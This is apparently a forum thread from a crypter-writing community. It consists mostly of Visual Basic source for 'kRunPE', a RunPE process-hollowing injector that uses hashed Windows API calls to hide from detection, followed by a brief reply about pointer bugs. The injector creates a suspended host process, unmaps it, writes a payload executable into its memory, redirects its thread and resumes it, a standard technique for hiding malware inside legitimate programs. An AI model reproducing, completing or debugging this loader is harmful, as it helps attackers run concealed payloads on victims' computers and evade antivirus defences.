'hGlobal = fCallAPI(("Kernel32"), ("LoadResource"), hMod, hRsrc) ---> hGlobal = fCallAPI(("Kernel32"), (&h934E1F7B), hMod, hRsrc)
'lpData = fCallAPI(("Kernel32"), ("LockResource"), hGlobal) ---> lpData = fCallAPI(("Kernel32"), (&h9A4E2F7B), hGlobal)
'Size = fCallAPI(("Kernel32"), ("SizeofResource"), hMod, hRsrc) ---> Size = fCallAPI(("Kernel32"), (&h3F2A9609), hMod, hRsrc)
'fCallAPI ("Kernel32"), ("RtlMoveMemory"), VarPtr(B(0)), lpData, Size ---> fCallAPI ("Kernel32"), (&hCF14E85B), VarPtr(B(0)), lpData, Size
'fCallAPI ("Kernel32"), ("FreeResource"), hGlobal ---> fCallAPI ("Kernel32"), (&h54423F7C), hGlobal
'fCallAPI ("Kernel32"), ("FreeLibrary"), hMod ---> fCallAPI ("Kernel32"), (&h4DC9D5A0), hMod
And all API's in kRunPE:
Public Function fInjectExe(ByRef bvBuff() As Byte, ByVal sHost As String, Optional ByVal sParams As String, Optional ByRef hProcess As Long) As Long
Dim hModuleBase As Long
Dim hPE As Long
Dim hSec As Long
Dim ImageBase As Long
Dim gNumC As Long
Dim tSTARTUPINFO(16) As Long
Dim tPROCESS_INFORMATION(3) As Long
Dim tCONTEXT(50) As Long
Dim KERNEL32 As String
Dim NTDLL As String
KERNEL32 = "KERNEL32"
NTDLL = "NTDLL"
hModuleBase = VarPtr(bvBuff(0))
If Not GetNumb(hModuleBase, fClngW("2")) = fClngW("&H5A4D") Then Exit Function
hPE = hModuleBase + GetNumb(hModuleBase + fClngW("&H3C"))
If Not GetNumb(hPE) = fClngW("&H4550") Then Exit Function
ImageBase = GetNumb(hPE + fClngW("&H34"))
tSTARTUPINFO(0) = fClngW("&H44")
'CreateProcessW
Call fCallAPI(KERNEL32, &H16B3FE88, 0, StrPtr(sHost), 0, 0, 0, fClngW("&H4"), 0, 0, VarPtr(tSTARTUPINFO(0)), VarPtr(tPROCESS_INFORMATION(0)))
'NtUnmapViewOfSection
Call fCallAPI(NTDLL, &HF21037D0, tPROCESS_INFORMATION(0), ImageBase)
'NtAllocateVirtualMemory
Call fCallAPI(NTDLL, &HD33BCABD, tPROCESS_INFORMATION(0), VarPtr(ImageBase), 0, VarPtr(GetNumb(hPE + fClngW("&H50"))), fClngW("&H3000"), fClngW("&H40"))
'NtWriteVirtualMemory
Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase, VarPtr(bvBuff(0)), GetNumb(hPE + fClngW("&H54")), 0)
For gNumC = 0 To GetNumb(hPE + fClngW("&H6"), fClngW("2")) - fClngW("1")
hSec = hPE + fClngW("&HF8") + (fClngW("&H28") * gNumC)
'NtWriteVirtualMemory
Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase + GetNumb(hSec + fClngW("&HC")), hModuleBase + GetNumb(hSec + fClngW("&H14")), GetNumb(hSec + fClngW("&H10")), 0)
Next gNumC
tCONTEXT(0) = fClngW("65543")
'NtGetContextThread
Call fCallAPI(NTDLL, &HE935E393, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
'NtWriteVirtualMemory
Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), tCONTEXT(41) + fClngW("&H8"), VarPtr(ImageBase), fClngW("&H4"), fClngW("0"))
tCONTEXT(44) = ImageBase + GetNumb(hPE + fClngW("&H28"))
'NtSetContextThread
Call fCallAPI(NTDLL, &H6935E395, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
'NtResumeThread
Call fCallAPI(NTDLL, &HC54A46C8, tPROCESS_INFORMATION(1), 0)
hProcess = tPROCESS_INFORMATION(0)
fInjectExe = fClngW("1")
End Function
Private Function GetNumb(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long
'NtWriteVirtualMemory
Call fCallAPI("NTDLL", &HC5108CC2, -1, VarPtr(GetNumb), lPtr, lSize, 0)
End Function
The code is pretty confusing... it's hard to follow the calls without looking at the original API declarations neither the structure declaration... anyway looks like your passing the pointers incorrectly... can't help you much more... you should look at the functions return... using Msgbox() is the easiest way.. also the worst :laugh: